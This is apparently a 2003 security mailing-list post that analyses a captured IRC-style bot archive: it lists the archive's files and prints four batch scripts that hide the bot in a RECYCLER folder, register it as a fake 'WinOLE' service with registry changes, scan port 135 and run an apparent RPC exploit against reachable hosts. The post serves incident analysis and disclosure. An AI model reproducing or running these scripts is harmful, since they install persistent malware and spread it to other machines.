I was finally able to get bot.rar... Here is the archive list: Archive bot.rar Name Size Packed Ratio Date Time Attr CRC Meth Ver ---------------------------------------------------------------------------- --- winole.exe 572928 566724 98% 22-07-03 18:47 .....A 6E1BA67C m3e 2.9 wmpx.exe 43383 35139 80% 07-08-03 02:01 .....A 0A73E7CB m3e 2.9 wx11.bat 109 109 100% 06-08-03 18:29 .....A BA641709 m0e 2.9 wx12.bat 194 166 85% 07-08-03 03:28 .....A 66A7E567 m3e 2.9 wx12.exe 19618 10055 51% 06-08-03 20:55 .....A 273D03A0 m3e 2.9 logs 0 0 0% 07-08-03 14:22 .D.... 00000000 m0 2.0 unrar.bat 169 137 81% 06-08-03 18:22 .....A 4E276E39 m3e 2.9 UnRAR.exe 194048 87237 44% 16-06-03 18:32 ...... B638F78C m3e 2.9 bnc.cfg 76 75 98% 27-07-03 16:48 .....A 03CDF0A3 m3e 2.9 Clear.exe 28672 11962 41% 16-06-03 18:32 .....A FBA086F4 m3e 2.9 click.exe 32768 6149 18% 16-06-03 18:32 .....A EA3874C5 m3e 2.9 CRC.EXE 24096 8231 34% 16-06-03 21:41 .....A D2158CA5 m3e 2.9 cygwin1.dll 971080 375803 38% 17-06-03 03:06 .....A 7337F48A m3e 2.9 deploy.bat 274 185 67% 06-08-03 18:20 .....A A3DA5EC6 m3e 2.9 dhcpp.exe 69632 28908 41% 16-06-03 18:32 .....A 2CA5E915 m3e 2.9 drvx.dll 2853 1215 42% 06-08-03 21:03 .....A 5956B0F0 m3e 2.9 events.exe 134656 37316 27% 22-07-03 17:58 .....A 0EF30C5D m3e 2.9 jesus.dll 4254 1275 29% 07-08-03 01:21 .....A BFF39F13 m3e 2.9 LucomServer.dll 802 484 60% 06-08-03 18:00 .....A 4C649F72 m3e 2.9 msoft.dll 206 128 62% 24-07-03 00:13 .....A 8DF17003 m3e 2.9 nctl.exe 569344 542111 95% 26-07-03 21:12 .....A F0C7F7AA m3e 2.9 pslist.exe 49152 21746 44% 16-06-03 21:41 .....A ED211211 m3e 2.9 Q019204.EXE 21584 10136 46% 16-06-03 21:41 .....A 212BBC50 m3e 2.9 reg.reg 773 432 55% 04-08-03 14:23 .....A 6FE50066 m3e 2.9 service.exe 63488 26461 41% 01-07-03 10:40 .....A 78DBBEF8 m3e 2.9 service.txt 176 129 73% 06-08-03 18:02 .....A E63DBB36 m3e 2.9 SFind.exe 266752 263546 98% 07-08-03 02:04 .....A 76BB24D4 m3e 2.9 start.dll 6153 1745 28% 07-08-03 14:22 .....A 303AF0E8 m3e 2.9 users.dll 75017 23205 30% 07-08-03 01:22 .....A EE2F60B1 m3e 2.9 ---------------------------------------------------------------------------- --- 29 3152257 2060809 65% the .bat files are below: :::::::::::::: deploy.bat :::::::::::::: cd C:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004 mkdir "logs" copy bot.rar c:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004\LOGS\ net stop WinOLE service.exe -r WinOLE service.exe service.txt %SYSTEMROOT%\regedit.exe -S reg.reg net start WinOLE exit :::::::::::::: unrar.bat :::::::::::::: cd C:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004\ attrib -r bot.rar attrib -r unrar.exe attrib -r unrar.bat unrar.exe x bot.rar start deploy.bat EXIT :::::::::::::: wx11.bat :::::::::::::: cd C:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004\ ECHO. > RPC.dll sfind -p 135 %1 %2 del RPC.dll :::::::::::::: wx12.bat :::::::::::::: cd C:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004\ ECHO. > rpcf.dll ping -n 1 %2 | find "Reply" if errorlevel 1 goto end wx12.exe 1 %2 %1 wx12.exe 0 %2 %1 :end del rpcf.dll exit --------------------------------------------------------------------------- Captus Networks - Integrated Intrusion Prevention and Traffic Shaping - Instantly Stop DoS/DDoS Attacks, Worms & Port Scans - Automatically Control P2P, IM and Spam Traffic - Ensure Reliable Performance of Mission Critical Applications - Precisely Define and Implement Network Security and Performance Policies **FREE Vulnerability Assessment Toolkit - WhitePapers - Live Demo Visit us at: http://www.securityfocus.com/sponsor/CaptusNetworks_incidents_030814 ----------------------------------------------------------------------------
This archive was generated by hypermail 2b30 : Tue Aug 19 2003 - 11:40:26 PDT